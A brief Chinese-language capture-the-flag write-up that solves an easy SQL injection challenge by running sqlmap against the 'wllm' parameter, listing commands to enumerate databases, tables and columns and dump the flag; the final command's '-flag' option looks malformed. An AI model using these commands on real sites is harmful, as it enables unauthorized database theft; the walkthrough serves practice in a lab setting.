這道題呢就是很簡單的sql注入,我們直接用sqlmap來跑。
首先我們開啟頁面可以看見提示,引數為wllm
**然後我們啟動虛擬機器,輸入sqlmap的命令:sqlmap -u "url地址/?wllm=1" --dbs **
這段命令是為了爆破資料庫名
繼續爆表名:sqlmap -u "url地址/?wllm=1" -D test_db --tables
爆列名:sqlmap -u "url地址/?wllm=1" -D test_db -T test_tb --columns
最後就爆出flag啦:sqlmap -u "url地址/?wllm=1" -D test_db -flag --dump
要注意kali要開root許可權!!!